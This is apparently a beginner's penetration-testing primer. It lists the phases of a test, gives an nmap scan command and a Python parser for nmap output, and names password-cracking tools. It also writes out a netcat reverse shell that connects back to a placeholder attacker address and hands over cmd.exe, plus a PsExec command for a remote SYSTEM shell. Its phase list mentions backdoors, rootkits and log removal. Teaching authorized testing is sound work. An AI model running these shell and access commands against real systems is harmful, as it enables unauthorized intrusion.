Preparation for pentesting.
- Footprinting - Determining the target's footprint, e.g. DNS records, IP scope, public information, contact information, etc.
- Scanning - Determining the target's openings, e.g. service ports, wireless networks, modem pools, VPN servers, etc.
- Enumeration - Determining the services behind the openings, e.g. web servers, operating systems, routers, firewalls, Wi-Fi authentication, etc.
- Penetration - Selecting appropriate exploits and penetrating the target, e.g. SQL injection, buffer overflow, password attacks, etc.
- Escalation - Escalating the obtained credentials to admin or root, e.g. DLL injection, local exploit, configuration change, scheduled jobs, etc.
- Getting Interactive - Getting a remote shell or GUI on the target, e.g. RDP, VNC, netcat, etc.
- Expanding Influence - Moving from the initial target, used as a foothold or beachhead, to the rest of the network, up to taking over the domain.
- Cleaning Up - Maintaining access (backdoors) and removing evidence, e.g. rootkits, log removal, log editing, etc. In an authorized test this is done only as agreed with the client, and every artifact left behind must be removed at the end of the engagement.
- Reporting - Writing and presenting a report on the pentest to the owners of the network one had authorization to test.
For more information, read these:
- Infosecwriters Demystifying Pen-test Article
- OSSTMM
- ISSAF
- Professionalsecuritytesters
- Penetration Testing Framework
Basic tools and examples
Port scanner
nmap -sS -vv -Pn -n -p 21,80,443 <target> // SYN scan of three ports, skip host discovery (-P0 in older nmap), no DNS resolution; -sS needs root
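The scan output is only useful once it is turned into a target list for the enumeration step. The following parser is an added example, not code from the original post: it reads nmap's grepable output (-oG), keeps only ports in state "open", and answers "which hosts expose port X". SAMPLE_SCAN is constructed output in the -oG format, so the script runs offline; pipe real output into it with `nmap ... -oG - <target> | python3 parse_nmap.py` (the file name is an assumption).

```python
"""Turn nmap grepable (-oG) output into per-host lists of open ports.

Added example for the scanning step, not part of the original post.
SAMPLE_SCAN below is constructed output in the -oG format (hosts in the
192.0.2.0/24 documentation range) so the script can run without a live scan.
"""
import sys
from collections import defaultdict

# Constructed -oG output: one "Status" line and one "Ports" line per host.
# Each port entry is port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -vv -Pn -n -p 21,80,443 -oG - 192.0.2.0/30
Host: 192.0.2.1 ()\tStatus: Up
Host: 192.0.2.1 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: closed (0)
Host: 192.0.2.2 ()\tStatus: Up
Host: 192.0.2.2 ()\tPorts: 21/filtered/tcp//ftp///, 80/closed/tcp//http///, 443/open/tcp//https///
# Nmap done at Mon Jan  1 00:00:01 2024 -- 4 IP addresses (2 hosts up) scanned in 0.50 seconds
"""


def parse_grepable(text):
    """Return {host: [(port, proto, service), ...]} for ports nmap reports as open."""
    open_ports = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines (# Nmap ...) carry no host data
        fields = line.split("\t")
        host = fields[0].split()[1]  # "Host: 192.0.2.1 ()" -> "192.0.2.1"
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # "Status: Up" line without port information
        for entry in ports_field[len("Ports:"):].split(","):
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue  # malformed entry; never trust scanner output blindly
            port, state, proto, service = parts[0], parts[1], parts[2], parts[4]
            if state == "open":  # filtered/closed ports are not openings
                open_ports[host].append((int(port), proto, service))
    return dict(open_ports)


def hosts_with_port(scan, port):
    """Hosts exposing `port`: the input list for the enumeration step."""
    return sorted(h for h, ports in scan.items() if any(p == port for p, _, _ in ports))


def main():
    # Read a saved -oG file if given, otherwise fall back to the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    scan = parse_grepable(text)
    for host, ports in sorted(scan.items()):
        print(host, ", ".join(f"{p}/{proto} ({svc})" for p, proto, svc in ports))
    print("hosts with 80/tcp:", hosts_with_port(scan, 80))


if __name__ == "__main__":
    main()
```

Run without arguments to see the constructed sample parsed; with a file argument it reads a saved -oG scan. Only "open" counts as an opening; "filtered" means a firewall dropped the probe and belongs in the enumeration notes rather than the attack surface.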
Backdoor (netcat reverse shell)
nc.exe -l -p 80 // attacker side: listen on port 80 for the target's outbound connection
nc.exe -v -e cmd.exe <attacker ip address> 80 // target side: connect back and hand the attacker a cmd.exe shell (-e exists only in netcat builds compiled with GAPING_SECURITY_HOLE)
PsExec, useful for remote access
psexec \\<target> -u administrator -p <password> -s cmd.exe // remote cmd.exe running as SYSTEM (-s) over the admin share
VNC: same purpose as PsExec, but with emphasis on a GUI session
Password cracking tools
Brutus password cracker
THC Hydra network login cracker
Aircrack-ng Wi-Fi WEP (and WPA-PSK) cracker